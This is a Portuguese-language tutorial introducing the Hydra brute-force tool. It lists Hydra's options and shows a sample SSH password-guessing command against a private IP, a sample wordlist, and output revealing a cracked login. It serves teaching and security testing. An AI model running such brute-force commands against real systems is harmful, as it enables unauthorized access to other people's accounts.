Basicamente, o Hydra descobre senha através de brute-force (tentativa e erro), ele busca em wordlists, possíveis usuários/senhas e vai testando as combinações, uma a uma.

O Hydra tem suporte aos serviços Telnet, Formulário HTTP/HTTPS, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.

A ferramenta já vem toda instalada e configurada (inclusive com interface gráfica) no BackTrack, porém, caso não tenha instalado, basta fazer o download do código-fonte e compilá-la em qualquer distribuição.

Para isso, acesse: http://www.thc.org/thc-hydra

Abaixo, segue alguns parâmetros:

• -R → Restaura sessões abordadas/quebradas.
• -S → Conexão segura usando SSL caso seja necessário.
• -s → Especifica em qual porta o Hydra vai estabelecer a conexão.

Sintaxe:

# hydra –l username –p password –t threads IP protocol
# hydra -L lista -P lista -t threads IP protocol

Explicação:

• -l → Nome/login da vítima;
• -L → Carrega uma lista contendo nomes/logins de vítimas (1 por linha);
• -p → Especifica senha única;
• -P → Carrega uma lista com senhas (1 por linha);
• -e → Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
• -C → Usado para carregar um arquivo contendo usuário:senha. Formato usuário:senha equivale a - L/-P;
• -M → Carrega lista de servidores alvos (1 por linha);
• -o → Salva as senhas encontradas dentro do arquivo que você especificar;
• -f → Faz o programa parar de trabalhar quando a senha ou usuário for encontrada[o];
• -t → Limita o numero de solicitações por vez (default: 16);
• -w → Define o tempo máximo em segundos para esperar resposta do servidor (default: 30s);
• -v / -V → Modo verbose do programa. 'V' mostra todas tentativas.

Abaixo, segue um exemplo com o protocolo SSH:

# hydra –L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh

Ele irá efetuar um brute-force com usuários presentes na lista e com as senhas presentes na lista "wordlist.txt", no servidor cujo IP é: 192.168.0.101

Bom, abaixo segue um cat do meu "wordlist.txt":

# cat wordlist.txt

darlan
hugo
diogo
danilo
paula
rosi
1234
mudar1234
P@ssw0rd
coracao
teste
teste123
root
root123
tux123
123tux

Saída do Hydra:

# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-03 15:17:16
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 servers, 256 login tries (l:16/p:16), ~16 tries per task
[DATA] attacking service ssh on port 22
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
[22][ssh] host: 192.168.0.101 login: darlan password: tux123      //AQUI ESTÁ!
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting

Repare que ele testa várias combinações e retorna Timeout, quando não consegue fechar a autenticação.

Porém, quando consegue, ele retorna:

[porta][protocolo] host: IP login: "login correto" password: "senha correta"
[22][ssh] host: 192.168.0.101    login: darlan    password: tux123

Bom, esta foi apenas um introdução.
Um abraço a todos. :)

Dica previamente publicada em:

• Introdução ao Hydra - Brute Force « www.sempreupdate.com.br